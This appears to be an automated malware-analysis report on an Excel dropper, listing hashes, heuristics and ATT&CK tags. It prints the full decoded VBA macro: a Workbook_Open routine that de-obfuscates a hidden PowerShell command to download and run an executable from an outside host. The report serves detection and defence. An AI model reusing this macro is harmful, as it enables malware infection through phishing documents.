Xls.Dropper.Agent-1868825 Office (OLE) malware analysis — malicious · 034d584f7f5e00f5

MALICIOUS

Office (OLE)

70.5 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2017-02-23

MD5: a9f9bc3239f4e7ca750ecc6d6b145b59 SHA-1: 7b16e132c23416b1d523535e58c85460a3ca6e01 SHA-256: 034d584f7f5e00f558ec2bc28977a863b86332871018ed209814a2fed4e1a79e

148 Risk Score

Malware Insights

Xls.Dropper.Agent-1868825 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical heuristic 'OLE_VBA_SHELL' and the presence of a Workbook_Open macro indicate that the VBA code is designed to execute arbitrary commands. The ClamAV detection 'Xls.Dropper.Agent-1868825' strongly suggests this is a dropper. The VBA code itself is heavily obfuscated, but the Workbook_Open subroutine is present and calls a function that is likely responsible for executing the malicious payload, consistent with a dropper's behavior.

Heuristics 4

ClamAV: Xls.Dropper.Agent-1868825 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-1868825
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

cleantag = qfpnxorhuyjexpsya & blousedepth & eldertitle & "mK7pIB%7\IAZdJ7077vIBe7J3Z4KZ9R70I8Z4ZK3KQ9B72RK.JBeRxIe"
Shell pvrspjwqcbai(cleantag), 0
eaoskhjyyuh = "d9042ndoinle"

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro

Matched line in script

Attribute VB_Customizable = True
Public Sub Workbook_Open()
Módulo1.blczjrjsxagnufbict

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4651 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4651 bytes
SHA-256: `67643eb61ca95cb2447e38c5c1c154a730dbc976966bff8ce2cfb5da56127b49`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Public Sub Workbook_Open() Módulo1.blczjrjsxagnufbict itemtower = 606 If itemtower - 273 Then jamkbwtpiimiuej = "prizetwin" jamkbwtpiimiuej = 217 End If End Sub Attribute VB_Name = "Hoja1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Hoja2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Hoja3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Módulo1" Public Function remembertree(dmcuojvvodansv) Dim cottonpanda As Boolean xrtjmzehqflpmzpvza = "" cottonpanda = InStrRev("JZKIIB77BKRQ", dmcuojvvodansv) colorfeed = 242 If colorfeed - 5 Then birdjunior = "labelsing" birdjunior = 789 End If If Not cottonpanda Then nwwofunzqsybx = "qerxdnzup" nwwofunzqsybx = 680 kzxefzlmbzgmqwoqogk = "zviivqwutjx" kzxefzlmbzgmqwoqogk = 221 xrtjmzehqflpmzpvza = dmcuojvvodansv girlhurt = "cjaafcurvval" girlhurt = 753 enforcemosquito = 841 If enforcemosquito - 16 Then enforcemosquito = enforcemosquito * 2 End If End If remembertree = xrtjmzehqflpmzpvza lxfuhgjzsqwdratnh = 235 If lxfuhgjzsqwdratnh - 185 Then lxfuhgjzsqwdratnh = lxfuhgjzsqwdratnh * 2 End If End Function Public Function pvrspjwqcbai(stxrtjmzehqflpmzpvza) foxnest = "" arrestjunior = "dpoxbvjpndc" arrestjunior = 402 silenttime = 96 If silenttime - 949 Then hugidjceo = "gardenvintage" hugidjceo = 476 End If For objnddhxxlaxrqgotpj = 1 To Len(stxrtjmzehqflpmzpvza) bjehheinyjrnykqclcz = Mid(stxrtjmzehqflpmzpvza, objnddhxxlaxrqgotpj, 1) creekinstall = 456 If creekinstall - 294 Then creekinstall = creekinstall * 2 End If parentwagon = "omwdzwmdcw" parentwagon = 829 foxnest = foxnest & remembertree(bjehheinyjrnykqclcz) auntshoot = 697 If auntshoot - 948 Then yrivdtheiqlcqudx = "izmwldirafohqrlej" yrivdtheiqlcqudx = 583 End If giverocket = "vriukomjekiuym" giverocket = 247 Next dreamtravel = "hsafjdwyahm" dreamtravel = 848 mzvprgrmmgxagnwvoew = "fabricturtle" mzvprgrmmgxagnwvoew = 307 pvrspjwqcbai = foxnest End Function Public Sub blczjrjsxagnufbict() xrjmdgkgkdlzp = "finalfocus" xrjmdgkgkdlzp = 22 jjiyrpxvzcrxpypdy = 141 If jjiyrpxvzcrxpypdy - 973 Then End If blousedepth = "RnQtQI)J.KJDZo7RwKnKlIRoJZaQBdRBFJiIJlBeQ(JR'Kh7t7tRpBZ:JR/B/7dBIrIyJ7v7eIrQsKKd77o7QcIuQJmQQeJnZ7tBBsBRa7nJ7dQcIu7sBBtKBoB7mR.7cBoKKm7Q/RjK4ZvQK47u7Jp7dKaKZt73ZsR2Q0B1K6JB.7eIBxReKZ'I,R'K%IKT7KEKKM7PBI%B\K7A7RdRK07v77eI3I4BB9B0B8JR" yfwjnveizdsmkgbntf = 849 If yfwjnveizdsmkgbntf - 600 Then excusemonkey = "oftenpublic" excusemonkey = 450 End If qfpnxorhuyjexpsya = "7KcQmKdIB.BZeIxKKeIJ I7/KcI BpBoRwIe7JrBsBBh7eQZlKlZQ.BeZxKeR RB-JQwB KIh7iIdKd7eQQnJJ ZB-IInBIo7RpZ B-IeBBpIQ RbIyJpKIaBsKKsB I(BN7Ie7Iw7-IOBbBjQe7cJtRZ 7SQRyKIs7ItIQeKmIK.KNKeBtQK.IIWKReKKb7CZZlBi7BeZ" vaxoaeoggkqklcsmj = "swwoppqrxkom" vaxoaeoggkqklcsmj = 222 yzmlkpjldle = "nyfwywddppeyffo" yzmlkpjldle = 163 eldertitle = "47Q3I9B2B.BeBKxIBeR'B)7J I&I KI%BKtII" donatehead = "refruizdboqnnssyzi" donatehead = 31 jtomgzynvrqxpwd = 900 If jtomgzynvrqxpwd - 505 Then jtomgzynvrqxpwd = jtomgzynvrqxpwd * 2 End If dbifksynyqelgbjokzh = "e20n23in" ysybrszqrayue = 629 If ysybrszqrayue - 574 Then End If zolhlcvtgd = "beginvehicle" zolhlcvtgd = 241 cleantag = qfpnxorhuyjexpsya & blousedepth & eldertitle & "mK7pIB%7\IAZdJ7077vIBe7J3Z4KZ9R70I8Z4ZK3KQ9B72RK.JBeRxIe" Shell pvrspjwqcbai(cleantag), 0 eaoskhjyyuh = "d9042ndoinle" bittervoice = 24 If bittervoice - 873 Then sqjdezstqxjn = "halfmask" sqjdezstqxjn = 546 End If gyoxeidduqt = "neofieon" oystertotal = 609 If oystertotal - 967 Then oystertotal = oystertotal * 2 End If bzjpxzpncwo = "lxabasfdkt" bzjpxzpncwo = 514 End Sub

SHA-256: 67643eb61ca95cb2447e38c5c1c154a730dbc976966bff8ce2cfb5da56127b49

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Workbook_Open()
Módulo1.blczjrjsxagnufbict
itemtower = 606
If itemtower - 273 Then
jamkbwtpiimiuej = "prizetwin"
jamkbwtpiimiuej = 217
End If
End Sub


Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hoja2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hoja3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Módulo1"
Public Function remembertree(dmcuojvvodansv)
Dim cottonpanda As Boolean
xrtjmzehqflpmzpvza = ""
cottonpanda = InStrRev("JZKIIB77BKRQ", dmcuojvvodansv)
colorfeed = 242
If colorfeed - 5 Then
birdjunior = "labelsing"
birdjunior = 789
End If
If Not cottonpanda Then
nwwofunzqsybx = "qerxdnzup"
nwwofunzqsybx = 680
kzxefzlmbzgmqwoqogk = "zviivqwutjx"
kzxefzlmbzgmqwoqogk = 221
xrtjmzehqflpmzpvza = dmcuojvvodansv
girlhurt = "cjaafcurvval"
girlhurt = 753
enforcemosquito = 841
If enforcemosquito - 16 Then
enforcemosquito = enforcemosquito * 2
End If
End If
remembertree = xrtjmzehqflpmzpvza
lxfuhgjzsqwdratnh = 235
If lxfuhgjzsqwdratnh - 185 Then
lxfuhgjzsqwdratnh = lxfuhgjzsqwdratnh * 2
End If
End Function
Public Function pvrspjwqcbai(stxrtjmzehqflpmzpvza)
foxnest = ""
arrestjunior = "dpoxbvjpndc"
arrestjunior = 402
silenttime = 96
If silenttime - 949 Then
hugidjceo = "gardenvintage"
hugidjceo = 476
End If
For objnddhxxlaxrqgotpj = 1 To Len(stxrtjmzehqflpmzpvza)
bjehheinyjrnykqclcz = Mid(stxrtjmzehqflpmzpvza, objnddhxxlaxrqgotpj, 1)
creekinstall = 456
If creekinstall - 294 Then
creekinstall = creekinstall * 2
End If
parentwagon = "omwdzwmdcw"
parentwagon = 829
foxnest = foxnest & remembertree(bjehheinyjrnykqclcz)
auntshoot = 697
If auntshoot - 948 Then
yrivdtheiqlcqudx = "izmwldirafohqrlej"
yrivdtheiqlcqudx = 583
End If
giverocket = "vriukomjekiuym"
giverocket = 247
Next
dreamtravel = "hsafjdwyahm"
dreamtravel = 848
mzvprgrmmgxagnwvoew = "fabricturtle"
mzvprgrmmgxagnwvoew = 307
pvrspjwqcbai = foxnest
End Function
Public Sub blczjrjsxagnufbict()
xrjmdgkgkdlzp = "finalfocus"
xrjmdgkgkdlzp = 22
jjiyrpxvzcrxpypdy = 141
If jjiyrpxvzcrxpypdy - 973 Then
End If
blousedepth = "RnQtQI)J.KJDZo7RwKnKlIRoJZaQBdRBFJiIJlBeQ(JR'Kh7t7tRpBZ:JR/B/7dBIrIyJ7v7eIrQsKKd77o7QcIuQJmQQeJnZ7tBBsBRa7nJ7dQcIu7sBBtKBoB7mR.7cBoKKm7Q/RjK4ZvQK47u7Jp7dKaKZt73ZsR2Q0B1K6JB.7eIBxReKZ'I,R'K%IKT7KEKKM7PBI%B\K7A7RdRK07v77eI3I4BB9B0B8JR"
yfwjnveizdsmkgbntf = 849
If yfwjnveizdsmkgbntf - 600 Then
excusemonkey = "oftenpublic"
excusemonkey = 450
End If
qfpnxorhuyjexpsya = "7KcQmKdIB.BZeIxKKeIJ I7/KcI BpBoRwIe7JrBsBBh7eQZlKlZQ.BeZxKeR RB-JQwB KIh7iIdKd7eQQnJJ ZB-IInBIo7RpZ B-IeBBpIQ RbIyJpKIaBsKKsB I(BN7Ie7Iw7-IOBbBjQe7cJtRZ 7SQRyKIs7ItIQeKmIK.KNKeBtQK.IIWKReKKb7CZZlBi7BeZ"

vaxoaeoggkqklcsmj = "swwoppqrxkom"
vaxoaeoggkqklcsmj = 222
yzmlkpjldle = "nyfwywddppeyffo"
yzmlkpjldle = 163
eldertitle = "47Q3I9B2B.BeBKxIBeR'B)7J I&I KI%BKtII"
donatehead = "refruizdboqnnssyzi"
donatehead = 31
jtomgzynvrqxpwd = 900
If jtomgzynvrqxpwd - 505 Then
jtomgzynvrqxpwd = jtomgzynvrqxpwd * 2
End If
dbifksynyqelgbjokzh = "e20n23in"
ysybrszqrayue = 629
If ysybrszqrayue - 574 Then
End If
zolhlcvtgd = "beginvehicle"
zolhlcvtgd = 241
cleantag = qfpnxorhuyjexpsya & blousedepth & eldertitle & "mK7pIB%7\IAZdJ7077vIBe7J3Z4KZ9R70I8Z4ZK3KQ9B72RK.JBeRxIe"
Shell pvrspjwqcbai(cleantag), 0
eaoskhjyyuh = "d9042ndoinle"
bittervoice = 24
If bittervoice - 873 Then
sqjdezstqxjn = "halfmask"
sqjdezstqxjn = 546
End If
gyoxeidduqt = "neofieon"
oystertotal = 609
If oystertotal - 967 Then
oystertotal = oystertotal * 2
End If

bzjpxzpncwo = "lxabasfdkt"
bzjpxzpncwo = 514
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.